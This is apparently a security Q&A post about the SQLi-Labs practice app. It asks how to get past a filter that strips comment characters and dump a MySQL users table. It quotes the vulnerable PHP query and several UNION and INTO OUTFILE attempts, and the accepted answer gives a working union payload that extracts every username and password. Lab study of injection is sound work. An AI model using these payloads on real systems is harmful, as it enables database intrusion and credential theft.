# SQLi with comment filter: dumping the database

Tags: sql-injection, mysql

The following SQLi (MySQL) filter is from SQLi-Labs:

```
...
 $reg = "/#/"
 $reg1 ="/--/"
 $replace =""
 $id=preg_replace($reg,$replace,$id);
 $id=preg_replace($reg1,$replace,$id);
 ....
 $sql = "SELECT * FROM users where id='$id' LIMIT 0,1";
```

I know the filter can be evaded by something like `'or '1'='1`.
However, I would like to see if it is possible to perform an outfile dump of the whole database, so I've tried things like:

```
 ' union select null,username,password from users into outfile "/tmp/file"...
```

however due to the `' LIMIT 0,1` at the end I'm having trouble figuring out how to end the payload. I've thought about doing multiple union queries, say:

```
 ' union all select null,username,password from users into outfile "/tmp/file" union all select null,username,password from users group by '
```

However, I get an error, because I believe the `into outfile` part has to be the last query. I also thought about using `FIELDS TERMINATED BY '` but now the `LIMIT 0,1` is in my way.

Is there anyway around this to perform a outfile dump of the database? 
Is it possible to dump the database through the error instead?

Answer (score 1, accepted):

I figured out that the following injection dumped the database(not through outfile though):

`' union select null,group_concat(username),group_concat(password) from users group by '`